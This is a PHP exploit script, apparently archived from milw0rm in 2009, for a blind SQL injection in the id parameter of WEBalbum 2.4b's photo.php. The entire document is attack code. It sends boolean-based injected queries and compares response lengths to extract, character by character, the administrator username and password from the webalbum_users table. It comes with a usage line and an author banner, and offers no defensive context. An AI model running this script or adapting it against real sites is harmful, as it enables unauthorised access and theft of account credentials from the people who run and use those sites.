WEBalbum 2.4b (photo.php id) Blind SQL Injection Exploit<?php
ini_set(`max_execution_time`,0);
print_r('
##############################################################################
#
#                WEBalbum v2.4b Blind SQL Injection Exploit
#                 (Some webpages have a diffirint table name)
#                      ---->>>> xoron <<<<<-----
#                           xorontr@gmail.com
#                            XORON (c) 2009
#
#     WARNING!: php xoron.php `http://www.web-album.org/[PATH]/photo.php?id=1`
#
##############################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url.`+and+1=1--`));
echo `\nExploiting:\n`;
$w = strlen(file_get_contents($url.`+and+1=0--`));
$t = abs((100-($w/$r*100)));
echo `Username: `;
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url.`+and+ascii(substring((select+login+from+webalbum_users+limit+0,1),`.$i.`,1))!=0--`));
   if (abs((100-($laenge/$r*100))) > $t-1) {
      $count = $i;
      $i = 30;
   }
}
for ($j = 1; $j < $count; $j++) {
   for ($i = 46; $i <= 122; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url.`+and+ascii(substring((select+login+from+webalbum_users+limit+0,1),`.$j.`,1))%3E`.$i.`--`));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url.`+and+ascii(substring((select+login+from+webalbum_users+limit+0,1),`.$j.`,1))%3E`.($i-1).`--`));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 122;
      }
   }
}
echo `\nPassword: `;
for ($j = 1; $j <= 49; $j++) {
   for ($i = 46; $i <= 102; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url.`+and+ascii(substring((select+password+from+webalbum_users+limit+0,1),`.$j.`,1))%3E`.$i.`--`));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url.`+and+ascii(substring((select+password+from+webalbum_users+limit+0,1),`.$j.`,1))%3E`.($i-1).`--`));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 102;
      }
   }
}
}
?>

# milw0rm.com [2009-02-03]